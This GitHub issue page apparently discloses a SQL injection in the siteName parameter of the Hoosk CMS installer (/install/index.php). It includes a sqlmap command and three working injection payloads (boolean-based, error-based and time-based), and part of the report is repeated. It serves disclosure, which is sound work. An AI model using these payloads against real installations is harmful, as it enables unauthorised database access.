You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Capture the data packet and save it as 1.txt. Use sqlmap for SQL injection. python sqlmap.py -r 1.txt -p siteName --risk=3 --level=5 --dbms=mysql -dbs
Successfully injected and the payload given by sqlmap is as follows.
Parameter: siteName (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: siteName=123'+(SELECT 0x71467343 WHERE 6028=6028 AND 9890=9890)+'&siteURL=192.168.1.16&dbName=Hoosk&dbUserName=root&dbPass=root&dbHost=localhost
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: siteName=123'+(SELECT 0x6f6b6255 WHERE 2162=2162 AND GTID_SUBSET(CONCAT(0x717a626271,(SELECT (ELT(2605=2605,1))),0x716a6b7a71),2605))+'&siteURL=192.168.1.16&dbName=Hoosk&dbUserName=root&dbPass=root&dbHost=localhost
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: siteName=123'+(SELECT 0x46574d4d WHERE 1554=1554 AND (SELECT 2156 FROM (SELECT(SLEEP(5)))Msqm))+'&siteURL=192.168.1.16&dbName=Hoosk&dbUserName=root&dbPass=root&dbHost=localhost
The text was updated successfully, but these errors were encountered:
The vulnerability lies in
/install/index.php
Lines 63-68

As we can see, the siteName parameter is directly concatenated into the statement without any filtering.
Capture the data packet and save it as 1.txt. Use sqlmap for SQL injection.
python sqlmap.py -r 1.txt -p siteName --risk=3 --level=5 --dbms=mysql -dbs
Successfully injected and the payload given by sqlmap is as follows.
The text was updated successfully, but these errors were encountered: